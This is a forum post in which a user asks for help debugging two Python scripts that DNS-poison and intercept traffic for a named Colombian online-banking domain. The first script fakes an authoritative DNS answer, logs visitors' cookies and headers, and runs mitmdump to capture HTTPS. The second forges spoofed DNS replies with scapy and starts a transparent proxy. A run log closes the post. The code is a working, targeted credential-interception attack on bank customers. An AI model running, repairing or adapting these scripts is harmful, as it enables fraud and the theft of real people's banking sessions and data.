
DNS POISONING

святой бог

I'm trying to DNS-poison a target, but I don't understand the attack at all; could someone please explain what I'm doing wrong?

Python:
import os
import sys
import threading
import subprocess
import time
import signal

# --------------------------------------------------------------------------------
# 1) ELEVACIÓN A ADMINISTRADOR (auto‐runas)
# --------------------------------------------------------------------------------

def is_admin():
    """
    Report whether this process runs with Windows Administrator privileges.

    Calls shell32.IsUserAnAdmin through ctypes. Any failure along the way
    (non-Windows platform where ctypes.windll does not exist, missing DLL,
    call error) is treated as "not elevated" and yields False.
    """
    try:
        import ctypes
        shell32 = ctypes.windll.shell32
    except Exception:
        return False
    try:
        return bool(shell32.IsUserAnAdmin())
    except Exception:
        return False

def relaunch_as_admin():
    """
    Re-launch this script through a UAC prompt ("runas" verb) and exit.

    The new instance is started with sys.executable, receiving the absolute
    script path followed by the original command-line arguments, each wrapped
    in double quotes. This function does not return: once ShellExecuteW has
    been issued the current process exits with status 0.
    """
    import ctypes
    script_path = os.path.abspath(sys.argv[0])
    quoted_args = " ".join(f'"{a}"' for a in sys.argv[1:])
    command_line = f'"{script_path}" {quoted_args}'
    # ShellExecuteW(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
    shell32 = ctypes.windll.shell32
    shell32.ShellExecuteW(
        None,
        "runas",          # triggers the UAC consent dialog
        sys.executable,   # python.exe that is running us
        command_line,
        None,
        1,                # SW_SHOWNORMAL
    )
    sys.exit(0)

# Elevate before anything below tries to bind a privileged port (53, 80, 443):
# relaunch_as_admin() starts a new UAC-elevated instance and exits this one,
# so the remainder of the module only ever runs in the elevated process.
if not is_admin():
    print("[*] No se detectan permisos de Administrador. Solicitando elevación UAC...")
    relaunch_as_admin()

# --------------------------------------------------------------------------------
# 2) IMPORTS Y CONFIGURACIÓN GENERAL
# --------------------------------------------------------------------------------

from dnslib import DNSRecord, DNSHeader, RR, QTYPE, A
from dnslib.server import DNSServer, BaseResolver, DNSLogger

from http.server import HTTPServer, BaseHTTPRequestHandler

# Name this server answers authoritatively. The trailing dot is stripped
# before comparison in AuthoritativeResolver.resolve().
DOMAIN = "virtual.bancodebogota.co."


# Address returned in the A answer (placeholder in the post, not a real address).
VPS_IP = "xxxxxxxx" 

# TTL for DNS answers (seconds)
FAKE_TTL = 120

# HTTP port (privileged port)
PORT_HTTP = 80

# HTTPS port (privileged port) handed to mitmdump
PORT_HTTPS = 443

# --------------------------------------------------------------------------------
# 3) IMPLEMENTACIÓN DEL RESOLVER DNS AUTORITATIVO
# --------------------------------------------------------------------------------

class AuthoritativeResolver(BaseResolver):
    """
    Answer A queries for DOMAIN authoritatively with VPS_IP.

    Every other query (different name, or a type other than A) gets
    NXDOMAIN (rcode 3). The reply copies the request id and question and
    sets qr=1, aa=1, ra=0 in the header.
    """
    def resolve(self, request, handler):
        question = request.q
        header = DNSHeader(id=request.header.id, qr=1, aa=1, ra=0)
        reply = DNSRecord(header, q=question)

        # Names are compared case-insensitively and without the trailing dot.
        asked = str(question.qname).lower().rstrip(".")
        served = DOMAIN.lower().rstrip(".")

        if asked != served or question.qtype != QTYPE.A:
            reply.header.rcode = 3  # NXDOMAIN
            return reply

        answer = RR(
            rname=question.qname,
            rtype=QTYPE.A,
            rclass=1,
            ttl=FAKE_TTL,
            rdata=A(VPS_IP),
        )
        reply.add_answer(answer)
        return reply

def start_dns_server():
    """
    Start the authoritative UDP/53 DNS server for DOMAIN on all interfaces.

    The server runs in its own thread (start_thread()). The dnslib DNSServer
    instance is returned so the caller can stop() it on shutdown.
    """
    print(f"[DNS] Iniciando DNS autoritativo para {DOMAIN} en 0.0.0.0:53 …")
    dns_logger = DNSLogger(prefix=False)
    udp_server = DNSServer(
        AuthoritativeResolver(),
        port=53,
        address="0.0.0.0",
        tcp=False,
        logger=dns_logger,
    )
    udp_server.start_thread()
    return udp_server

# --------------------------------------------------------------------------------
# 4) IMPLEMENTACIÓN DEL SERVIDOR HTTP (PUERTO 80)
# --------------------------------------------------------------------------------

class AuditHTTPHandler(BaseHTTPRequestHandler):
    """
    GET handler that records client address, User-Agent, Cookie header and
    request path to stdout and to auditoria.log (appended, UTF-8), then
    replies 200 with a fixed plain-text body. Other methods are not handled.
    """

    def do_GET(self):
        origin = self.client_address[0]
        user_agent = self.headers.get("User-Agent", "-")
        cookie_hdr = self.headers.get("Cookie", "-")
        req_path = self.path

        console_lines = [
            "\n[HTTP] PETICIÓN HTTP RECIBIDA:",
            f"    • Cliente IPv4: {origin}",
            f"    • User-Agent  : {user_agent}",
            f"    • Cookies     : {cookie_hdr}",
            f"    • Path        : {req_path}\n",
        ]
        for line in console_lines:
            print(line)

        # Header values are client-supplied and written to the log as-is.
        with open("auditoria.log", "a", encoding="utf-8") as log_file:
            record = f"[{time.ctime()}] {origin} | UA={user_agent} | Cookies={cookie_hdr} | Path={req_path}\n"
            log_file.write(record)

        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.end_headers()
        self.wfile.write("Servidor de Auditoría MIPYMES (HTTP)".encode("utf-8"))

    def log_message(self, format, *args):
        """Silence the per-request stderr line BaseHTTPRequestHandler emits."""
        return

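def start_http_server():
    """
    Serve HTTP on 0.0.0.0:PORT_HTTP with AuditHTTPHandler until the process ends.

    serve_forever() blocks, so this is meant to run in a thread. Failures exit
    the process with status 1: PermissionError (privileged port without
    elevation) gets a dedicated message that names PORT_HTTP rather than a
    hard-coded "80", any other exception a generic message.
    """
    try:
        httpd = HTTPServer(("0.0.0.0", PORT_HTTP), AuditHTTPHandler)
        print(f"[HTTP] Servidor HTTP iniciado en 0.0.0.0:{PORT_HTTP}")
        httpd.serve_forever()
    except PermissionError:
        # The message previously said "puerto 80" even if PORT_HTTP was changed.
        print(f"[ERROR] Necesitas privilegios de Administrador para bindear al puerto {PORT_HTTP}.")
        sys.exit(1)
    except Exception as e:
        print(f"[ERROR] Error iniciando HTTP server en puerto {PORT_HTTP}: {e}")
        sys.exit(1)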

# --------------------------------------------------------------------------------
# 5) INICIAR MITMPROXY (PUERTO 443)
# --------------------------------------------------------------------------------

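def start_mitmproxy():
    """
    Launch mitmdump listening on PORT_HTTPS and return the child process.

    Command-line flags (unchanged from the original):
    - --set flow_detail=2 : verbose flow logging.
    - --ssl-insecure      : upstream certificates are NOT validated.
    - -w mitm_traffic.log : flows are written to mitm_traffic.log.
    stdout/stderr of the child are discarded.

    Returns:
        The subprocess.Popen for the mitmdump child. The original discarded
        this handle, so nothing could terminate() mitmdump on shutdown and it
        outlived the script; callers that want a clean stop should keep it.

    Exits with status 1 when the mitmdump executable is not on PATH.
    """
    cmd = [
        "mitmdump",
        "-p", str(PORT_HTTPS),
        "--set", "flow_detail=2",
        "--ssl-insecure",
        "-w", "mitm_traffic.log",
    ]
    print(f"[TLS] Iniciando mitmdump (escuchando en 0.0.0.0:{PORT_HTTPS}) …")
    print(f"     Comando: {' '.join(cmd)}")
    try:
        return subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except FileNotFoundError:
        print("    ❌ mitmdump no se encontró. Instala mitmproxy y verifica que mitmdump esté en tu PATH.")
        sys.exit(1)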

# --------------------------------------------------------------------------------
# 6) EJECUCIÓN PRINCIPAL
# --------------------------------------------------------------------------------

if __name__ == "__main__":
    banner = f"""
===============================================================
   🌐 DNS + HTTP + HTTPS “MITM” FUERA DE RED LOCAL (Windows)
                  Dominio: {DOMAIN}
                  IP Este Host: {VPS_IP}
    -----------------------------------------------------------------
    1) Servidor DNS autoritativo en UDP/53 responde:
         {DOMAIN}{VPS_IP} (TTL={FAKE_TTL})
    2) Servidor HTTP en puerto {PORT_HTTP} registra User-Agent, Cookies y Path.
       Guarda todo en auditoria.log.
    3) mitmdump en puerto {PORT_HTTPS} intercepta TODO HTTPS y
       guarda flujos en mitm_traffic.log.
    4) Cualquier víctima en Internet que visite:
         http://{DOMAIN}   o   https://{DOMAIN}
       terminará en este servidor y quedarán sus datos registrados.
===============================================================
"""
    print(banner)

    # DNS runs in its own thread inside dnslib; keep the handle for stop().
    dns_server = start_dns_server()

    # HTTP server and mitmdump launcher each get a daemon thread so they die
    # with the main thread.
    for worker in (start_http_server, start_mitmproxy):
        threading.Thread(target=worker, daemon=True).start()

    # Idle until Ctrl+C. Only the DNS server is stopped explicitly; the
    # mitmdump child process started by start_mitmproxy is not terminated here.
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Cerrando todos los servicios…")
        dns_server.stop()
        sys.exit(0)
I only get a privilege-escalation error at run time.
 
I also tried another approach, which returns a bunch of nonsense parameters with 400 Bad Request errors.
Python:
from scapy.all import *
from scapy.layers.dns import DNS, DNSQR, DNSRR
from scapy.layers.inet import IP, UDP
import threading
import time
import sys
import subprocess

# =====================================================================
# CONFIGURACIÓN DEL ENTORNO
# =====================================================================
INTERFACE = "Ethernet 17"  # interface name handed to sniff() and send()
LEGITIMATE_DNS_IP = "143.204.23.2"  # resolver whose address is used as the forged reply's source (see send_poisoned_response)
ATTACKER_IP = "192xxxxx"  # this host (placeholder in the post); queries from it are ignored, the HTTP monitor binds here
TARGET_DOMAIN = "virtual.bancodebogota.co"  # substring a query name must contain to trigger a forged answer
SPOOF_IP = "192.xxxxxxx"  # address placed in the forged A record (placeholder in the post)
PORT_MONITORING = 8080  # local HTTP listener port
PORT_PROXY = 8081  # mitmdump listen port


# =====================================================================

def dns_sniffer():
    """
    Capture UDP/53 packets to or from LEGITIMATE_DNS_IP on INTERFACE and pass
    each one to analyze_dns(). Blocks for the life of its thread; store=0 so
    captured packets are not retained in memory.
    """
    print(f"[+] Iniciando sniffer en interfaz {INTERFACE}...")
    # BPF filter: DNS traffic only, and only when the chosen resolver is one endpoint.
    sniff_filter = f"udp port 53 and host {LEGITIMATE_DNS_IP}"
    sniff(iface=INTERFACE, filter=sniff_filter, prn=analyze_dns, store=0)


def analyze_dns(pkt):
    """
    sniff() callback. For a packet carrying a DNS question whose IPv4 source
    is not ATTACKER_IP and whose query name contains TARGET_DOMAIN, print the
    query and start a thread running send_poisoned_response(pkt).
    """
    if pkt.haslayer(DNSQR) and pkt[IP].src != ATTACKER_IP:
        domain = pkt[DNSQR].qname.decode().rstrip('.')
        # Substring test: any name containing TARGET_DOMAIN qualifies, not only the exact name.
        if TARGET_DOMAIN in domain:
            print(f"[!] DNS query detectada: {domain} desde {pkt[IP].src}")
            threading.Thread(target=send_poisoned_response, args=(pkt,)).start()


def send_poisoned_response(pkt):
    """
    Build and send a DNS answer for the captured query `pkt`.

    IP layer: src=LEGITIMATE_DNS_IP (a source address this host does not own),
    dst=the querier. UDP: sport 53, dport=the querier's source port. DNS:
    the query's transaction id and question, plus one A record (class IN,
    TTL 600) whose rdata is SPOOF_IP. Any exception is printed, not raised.

    Defender note: the packet claims an origin it does not have. Source-address
    validation on the network path, DNSSEC validation on the resolver, or
    encrypted DNS (DoT/DoH) to a trusted resolver each deprive such a forged
    answer of effect, and the mismatch between claimed and actual origin is
    what network monitoring can key on.
    """
    try:
        ip_layer = IP(src=LEGITIMATE_DNS_IP, dst=pkt[IP].src)
        udp_layer = UDP(dport=pkt[UDP].sport, sport=53)
        dns_layer = DNS(
            id=pkt[DNS].id,
            qr=1, aa=1,
            qd=pkt[DNS].qd,
            an=DNSRR(
                rrname=pkt[DNS].qd.qname,
                type="A", rclass="IN",
                ttl=600,
                rdata=SPOOF_IP
            )
        )
        send(ip_layer / udp_layer / dns_layer, verbose=0, iface=INTERFACE)
        print(f"[+] Respuesta envenenada enviada para {pkt[DNS].qd.qname.decode()}")
    except Exception as e:
        print(f"[!] Error enviando respuesta: {str(e)}")


def start_http_monitor():
    """
    Run a plain HTTP server on ATTACKER_IP:PORT_MONITORING that prints the
    client address, User-Agent, path and full header dict of each GET and
    answers 200 with a fixed body. Blocks (serve_forever).
    """
    from http.server import HTTPServer, BaseHTTPRequestHandler

    class MetadataHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            origin = self.client_address[0]
            header_map = dict(self.headers)
            print(f"\n[📡] HTTP Metadata desde {origin}:")
            print(f"User-Agent: {self.headers.get('User-Agent')}")
            print(f"Path: {self.path}")
            print(f"Headers: {header_map}")
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Servidor de Prueba (metadatos capturados)")

    print(f"[🌐] Servidor HTTP corriendo en {ATTACKER_IP}:{PORT_MONITORING}")
    monitor = HTTPServer((ATTACKER_IP, PORT_MONITORING), MetadataHandler)
    monitor.serve_forever()


def start_mitmproxy():
    """
    Spawn mitmdump in transparent mode on PORT_PROXY with --showhost.

    The child's Popen handle is discarded, so nothing in this script can stop
    it later. If the executable is not on PATH, an install hint is printed
    and the function returns normally.
    """
    print(f"[🔍] Iniciando mitmproxy en el puerto {PORT_PROXY}...")
    cmd = [
        "mitmdump",
        "--mode", "transparent",
        "--listen-port", str(PORT_PROXY),
        "--showhost",
    ]
    try:
        subprocess.Popen(cmd)
    except FileNotFoundError:
        print("[!] mitmproxy no está instalado. Instálalo con: pip install mitmproxy")


if __name__ == "__main__":
    # Refuse to run anywhere but Windows (sys.platform check).
    if sys.platform != "win32":
        print("[!] Este script está diseñado para ejecutarse en Windows")
        exit(1)

    banner = f"""
    ========================================================
    🧪 DNS CACHE POISONING TOOL - ENTORNO DE PRUEBA CONTROLADO
    Dominio objetivo:   {TARGET_DOMAIN}
    DNS legítimo:       {LEGITIMATE_DNS_IP}
    IP de redirección:  {SPOOF_IP}
    IP atacante (local):{ATTACKER_IP}
    Puerto HTTP local:  {PORT_MONITORING}
    Puerto mitmproxy:   {PORT_PROXY}
    ========================================================
    """
    print(banner)

    # Each service gets a daemon thread so all of them die with the main thread.
    workers = (dns_sniffer, start_http_monitor, start_mitmproxy)
    for fn in workers:
        threading.Thread(target=fn, daemon=True).start()

    # Idle until Ctrl+C; nothing is stopped explicitly beyond the daemon threads ending.
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Cerrando laboratorio...")

This is the log:

[+] Iniciando sniffer en interfaz Ethernet 17...
[🔍] Iniciando mitmproxy en el puerto 8081...
[🌐] Servidor HTTP corriendo en 192.168.1.12:8080
[01:41:38.967] Transparent mode on Windows is unsupported, flaky, and deprecated. Consider using local redirect mode or WireGuard mode instead.
[01:41:40.999] Transparent Proxy listening at *:8081.
192.168.1.12 - - [05/Jun/2025 01:42:13] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x01M\\x01\\x00\\x01I\\x03\\x03w')
192.168.1.12 - - [05/Jun/2025 01:42:13] "\x16\x03\x01\x01M\x01\x00\x01I\x03\x03w #\x88UB" 400 -
192.168.1.12 - - [05/Jun/2025 01:42:17] code 400, message Bad request version ('^0/')
192.168.1.12 - - [05/Jun/2025 01:42:17] "\x16\x03\x01\x07\x19\x01\x00\x07\x15\x03\x03\\ó#nkÄúæ\x13Ì\x1d°É\x1fs¦\x98Ë\x84nÿ\x7f\x86¬lQw?Ó\x80\x02V <#Q(+üÑU¶\x14Ë"^HÃõw\x93ùæ\x15é\x06Z\x87Q\x9b\x11ªõ°\x00 ZZ\x13\x01\x13\x02\x13\x03À+À/À,À0̨̩À\x13À\x14\x00\x9c\x00\x9d\x00/\x005\x01\x00\x06¬ÊÊ\x00\x00\x00\x17\x00\x00þ\x0d\x00º\x00\x00\x01\x00\x01Ê\x00 \x89¾\x9e³åª´\x19õ5\x92R·#\x0b¡´àå\x02¦\x91+Ê\x9a¬Þà))wr\x00\x90UKë\x9c%\x05\x8bJÐ%-\x9däVh\x8aâ/\x1a\x18Õá\x1bþÛû\x13\x15\x98Hµ0ÉR@õ!+õè\x92Éõ#\x99\x8cùÁ£\\¯;G'·'\x98Í\x90½\x07k\x86D\x0eCÇR \x90\x1e\x8e:\x09Á`\x10XT7G[ùõç\x19¼ßÌF\x11\x01ÑF´!r7úÏOmñ5¡½£pÔ\x0d'1A¡® a×Ï\x92\x037\x9d28\x0b^0/" 400 -
192.168.1.12 - - [05/Jun/2025 01:42:17] code 400, message Bad request version ('\\x00\\x12\\x00\\x10\\x04\\x03\\x08\\x04\\x04\\x01\\x05\\x03\\x08\\x05\\x05\\x01\\x08\\x06\\x06\\x01\\x00\\x1b\\x00\\x03\\x02\\x00\\x02\\x00')
192.168.1.12 - - [05/Jun/2025 01:42:17] "\x16\x03\x01\x07\x19\x01\x00\x07\x15\x03\x03\x9es\x9c:\x07\\º\x16Z«P\x18z<Æ\x112Ê$ûL7 jµ-\x04ÿlù\x936 \x00\x89=\x0bCùòH\x8b^<Ìä\x0dd|ÃcD:Ê\x83gA\x03ö\x1dåÌRYª\x00 \x1a\x1a\x13\x01\x13\x02\x13\x03À+À/À,À0̨̩À\x13À\x14\x00\x9c\x00\x9d\x00/\x005\x01\x00\x06¬JJ\x00\x00\x00\x10\x00\x0b\x00\x09\x08http/1.1þ\x0d\x00º\x00\x00\x01\x00\x01ù\x00 &1â\x97jô\x90\x97m\x17øF{\x03?ØMÐSáºÓ¾ÿïͼ~YHu)\x00\x90\x1biø\x12\x81å+^\x8c\x17íð`OuC3\x13gÄ|\x07\x13\x10lqme÷\x93ëj}\x98½[\x1b5\x90b+\x03"«®0\x1aF\x0bO&e¡üÖÇ\x99Îg\x09Áòö \x84éá¾öB\x92 y\x8a\x95W\x13ɽ)\x0c\x1e\x15v¢b\x0däÕ^\x09z\x06\x08äÁ@º\x9abï¹jù|Úé\x01Ö>?KÅÆóX·Ù\x97ì\x10\x06\x1f[fùáTÅ%=\x85áâæ÷åzBäè\x81Hå\x00\x12\x00\x00\x00\x0d\x00\x12\x00\x10\x04\x03\x08\x04\x04\x01\x05\x03\x08\x05\x05\x01\x08\x06\x06\x01\x00\x1b\x00\x03\x02\x00\x02\x00" 400 -
 

